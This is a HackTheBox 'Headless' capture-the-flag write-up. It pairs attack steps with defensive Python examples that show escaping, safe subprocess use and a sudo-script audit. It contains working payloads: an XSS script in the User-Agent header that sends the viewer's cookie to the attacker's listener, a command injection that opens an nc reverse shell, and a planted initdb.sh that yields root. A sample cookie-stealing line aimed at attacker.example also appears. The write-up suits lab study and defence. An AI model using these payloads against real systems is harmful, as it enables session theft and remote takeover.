HackTheBox Headless Writeup
Headless is an easy-rated HackTheBox machine and a good first target for beginners. This writeup walks through it step by step (host mapping, XSS, remote code execution and privilege escalation), keeping each step short and simple so that it is accessible to those new to CTFs.
Add Hosts
Edit the /etc/hosts file and add the following entry:
10.10.11.8 headless.htb
Script to add the host entry automatically:
ip="10.10.11.8"
domain="headless.htb"
# Append the entry only if it is not already present in /etc/hosts
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV headless.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-21 18:38 CEST
Nmap scan report for headless.htb (10.10.11.8)
Host is up (0.057s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_ 256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)
5000/tcp open http Werkzeug httpd 2.2.2 (Python 3.11.2)
|_http-title: Under Construction
|_http-server-header: Werkzeug/2.2.2 Python/3.11.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Port 22: SSH
- Port 5000: Werkzeug HTTP server (Python-based)
Useful URLs:
Exploiting XSS
echo -e "\nStart a listener on your machine:\n  python -m http.server 5000\nThen press Enter and wait until the callback appears"
read
# IP of the tun0 VPN interface, used as the callback host in the payload
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
# Payload sent in the User-Agent header; it sends the viewer's cookie (Base64-encoded) to the listener
payload='<script>var i=new Image(); i.src="http://'$vpnip':5000/?cookie="+btoa(document.cookie);</script>'
# The User-Agent value contains a space, so it must be double-quoted to reach curl as one header
curl -v -s 'http://headless.htb:5000/support' -X POST -H "User-Agent: $payload" \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://headless.htb:5000' -H 'DNT: 1' -H 'Sec-GPC: 1' -H 'Connection: keep-alive' \
-H "Content-Length: 112" \
-H 'Referer: http://headless.htb:5000/support' \
-H "Cookie: is_admin=$(curl -sD - http://headless.htb:5000/ | grep -oP '(?<=is_admin=)[^;]+')" \
-H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i' \
--data-raw 'fname=test&lname=test&email=test%40headless.htb&phone=0000000000&message=%3Cscript%3Ealert%281%29%3C%2Fscript%3E'
Wait for the message "GET /?cookie=..." in the listener. After retrieving the cookie, you can close the listener.
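The following is an added example and not code from the Headless box or this writeup. It shows, on the application side, the two things the step above relies on: a page that renders request fields (here the User-Agent stored with a support ticket) without escaping, and a cookie readable from document.cookie. The ticket record, the attacker.example host and the function names are constructed for the example; that the real application stores and renders the User-Agent this way is an assumption drawn from the fact that the payload in that header fires. Only the standard library is used.

```python
# Added example (not code from the Headless box or this writeup).
# Assumptions: the support form stores the request's User-Agent with the
# ticket and an admin page later renders the ticket as HTML; the is_admin
# cookie is set without HttpOnly, which is why document.cookie can read it.
from html import escape
from http.cookies import SimpleCookie

# Constructed ticket: the kind of record a support endpoint would store.
TICKET = {
    "fname": "test",
    "message": "<script>alert(1)</script>",
    "user_agent": '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
}


def render_ticket_unsafe(ticket: dict) -> str:
    """Vulnerable pattern: whatever the visitor sent becomes markup on the admin's page."""
    return (
        "<h2>Ticket from " + ticket["fname"] + "</h2>"
        "<p>" + ticket["message"] + "</p>"
        "<small>UA: " + ticket["user_agent"] + "</small>"
    )


def render_ticket_safe(ticket: dict) -> str:
    """Hardened: every untrusted field is HTML-escaped before it touches the page."""
    return (
        "<h2>Ticket from " + escape(ticket["fname"]) + "</h2>"
        "<p>" + escape(ticket["message"]) + "</p>"
        "<small>UA: " + escape(ticket["user_agent"]) + "</small>"
    )


def contains_active_markup(html: str) -> bool:
    """Does a raw <script> tag survive rendering? (Used to compare the two renderers.)"""
    return "<script" in html.lower()


def admin_cookie_header(value: str) -> str:
    """Build a Set-Cookie header with the flags that stop cookie theft through XSS."""
    c = SimpleCookie()
    c["is_admin"] = value
    c["is_admin"]["httponly"] = True  # not readable from document.cookie
    c["is_admin"]["samesite"] = "Lax"  # not sent on cross-site POSTs
    c["is_admin"]["path"] = "/"
    return c.output(header="Set-Cookie:")


if __name__ == "__main__":
    print(render_ticket_unsafe(TICKET))
    print(render_ticket_safe(TICKET))
    print(admin_cookie_header("opaque-session-token"))
```

Note that HttpOnly only blocks the cookie read; the injected script still runs in the admin's browser, so escaping (or a templating engine that escapes by default) is the actual fix and the cookie flags are defence in depth.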
Remote Code Execution (RCE)
echo -en "\nFirst start a listener:\n  nc -lvnp 9001\nAdmin cookie (Base64) -> "
read cookie
# The listener received the cookie Base64-encoded (btoa); decode it back to "is_admin=..."
cookie_decoded=$(echo "$cookie" | base64 -d)
# IP of the tun0 VPN interface, used as the reverse-shell target
vpnip=$(ip a | grep -A 2 "tun0:" | grep -oP '(?<=inet\s)\d+(\.\d+){3}')
# The date parameter is not sanitised, so ";nc ..." is executed as a second command
curl -sS 'http://headless.htb:5000/dashboard' -X POST \
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0' \
-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8' \
-H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Origin: http://headless.htb:5000' -H 'DNT: 1' -H 'Sec-GPC: 1' -H 'Connection: keep-alive' \
-H 'Referer: http://headless.htb:5000/dashboard' \
-H "Cookie: $cookie_decoded" \
-H 'Upgrade-Insecure-Requests: 1' -H 'Priority: u=0, i' \
--data-raw 'date=2023-09-15;nc+'$vpnip'+9001+-e+/bin/bash'
Get an Interactive Shell: once the reverse shell connects, convert it into an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Press Ctrl+Z to background the shell, then run:
stty size; stty raw -echo; fg
As the last step, set the terminal environment:
export TERM=xterm
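The following is an added example and not code from the Headless box or this writeup. The injection above works because the dashboard hands the date parameter to a shell, so a ";" ends the intended command and starts the attacker's. The example reconstructs that pattern as one line (the command string "bash report.sh <date>" is an assumption, the real handler is not shown on the page) and puts the hardened version next to it: validate the value as a date and run the child without a shell, so metacharacters stay literal. The child process here is a stand-in that just echoes its argument, which keeps the example runnable anywhere.

```python
# Added example (not code from the Headless box or this writeup).
# Assumption: the vulnerable handler builds a shell command string from the
# date parameter; "bash report.sh" is a constructed placeholder for it.
import re
import subprocess
import sys
from datetime import date

DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def build_unsafe_command(user_date: str) -> str:
    """Vulnerable pattern: user input interpolated into a command line meant for shell=True."""
    return f"bash report.sh {user_date}"


def validate_date(user_date: str) -> str:
    """Accept only a real ISO date; anything else is rejected before it is used."""
    if not DATE_RE.fullmatch(user_date):
        raise ValueError("date must look like YYYY-MM-DD")
    date.fromisoformat(user_date)  # rejects e.g. 2023-13-45
    return user_date


def run_report(user_date: str) -> str:
    """Hardened: validated value, argv list, no shell.
    The child is a stand-in for report.sh that prints its first argument back."""
    safe = validate_date(user_date)
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", safe]
    out = subprocess.run(argv, capture_output=True, text=True, check=True)
    return out.stdout.strip()


def argv_keeps_metacharacters_literal(user_date: str) -> str:
    """Even without validation, an argv list passes the whole string as ONE argument:
    ';' is data here, not a command separator. Returns what the child saw."""
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", user_date]
    return subprocess.run(argv, capture_output=True, text=True).stdout.strip()


if __name__ == "__main__":
    payload = "2023-09-15;id"
    print(build_unsafe_command(payload))               # a shell would run 'id' after the report
    print(argv_keeps_metacharacters_literal(payload))  # child sees the string literally
    print(run_report("2023-09-15"))
    try:
        run_report(payload)
    except ValueError as e:
        print("rejected:", e)
```

Both layers matter: validation keeps garbage out of the report logic, and the argv form means that even a value which slips past validation cannot become a second command.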
Privilege Escalation
After running sudo -l, you may notice the following:
(ALL) NOPASSWD: /usr/bin/syscheck
This means you can run /usr/bin/syscheck with sudo privileges. To exploit this, follow these steps:
Check the content of /usr/bin/syscheck:
cat /usr/bin/syscheck
Exploit the script:
# Create an initdb.sh in the directory syscheck is run from, then run syscheck as root
cd /tmp
echo -e '#!/bin/bash\n/bin/bash' > /tmp/initdb.sh
chmod +x /tmp/initdb.sh
sudo /usr/bin/syscheck
You should now have root access. Display the root flag:
id
cat /root/root.txt
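The following is an added example and not the Headless syscheck script, whose source this writeup does not reproduce. The steps above only work if syscheck reaches initdb.sh through a relative path, so that the working directory of whoever runs sudo decides which file executes as root; that is an inference from the steps, not something the page states. The example is a small audit for exactly that weakness in scripts allowed by NOPASSWD rules: it flags executables referenced relative to the current directory and checks whether the script pins its working directory. Both sample scripts and the /opt/syscheck path are constructed for the example.

```python
# Added example (not the Headless syscheck script). Audits a sudo-run script
# for relative executable references, the class of weakness inferred from the
# privilege-escalation steps. Sample scripts below are constructed.
import re

VULNERABLE_SCRIPT = """#!/bin/bash
# constructed sample: relative invocation, cwd chosen by the caller
if ! ./initdb.sh 2>/dev/null; then
    echo "database not running"
fi
"""

HARDENED_SCRIPT = """#!/bin/bash
# constructed sample: fixed cwd and an absolute, root-owned target
cd /opt/syscheck || exit 1
if ! /opt/syscheck/initdb.sh 2>/dev/null; then
    echo "database not running"
fi
"""

# A command position (line start, after ; & | !, or after if/then/do) followed by
# ./name, ../name or a bare *.sh file name.
RELATIVE_EXEC = re.compile(
    r"(?:^|[;&|!]\s*|\bthen\s+|\bdo\s+|\bif\s+!?\s*)"
    r"(\.{1,2}/\S+|[A-Za-z0-9_.-]+\.sh)\b"
)


def find_relative_execs(script_text: str) -> list:
    """Return (line number, token) for every executable referenced relative to the cwd."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for m in RELATIVE_EXEC.finditer(stripped):
            findings.append((lineno, m.group(1)))
    return findings


def sets_fixed_cwd(script_text: str) -> bool:
    """True if the script cd's to an absolute directory at some point."""
    return any(re.match(r"\s*cd\s+/", line) for line in script_text.splitlines())


def audit(script_text: str) -> list:
    """Human-readable findings; empty when nothing relative was found."""
    msgs = []
    relative = find_relative_execs(script_text)
    for lineno, tok in relative:
        msgs.append(f"line {lineno}: '{tok}' is resolved against the caller's cwd; use an absolute path")
    if relative and not sets_fixed_cwd(script_text):
        msgs.append("script never changes to a fixed directory")
    return msgs


if __name__ == "__main__":
    for name, text in (("vulnerable", VULNERABLE_SCRIPT), ("hardened", HARDENED_SCRIPT)):
        print(name, "->", audit(text) or "no findings")
```

The regex is deliberately narrow (it does not try to parse shell), so treat a clean result as "nothing obvious" rather than proof; the fix it points at is the same in every case: absolute paths, a fixed cwd, and targets that only root can write.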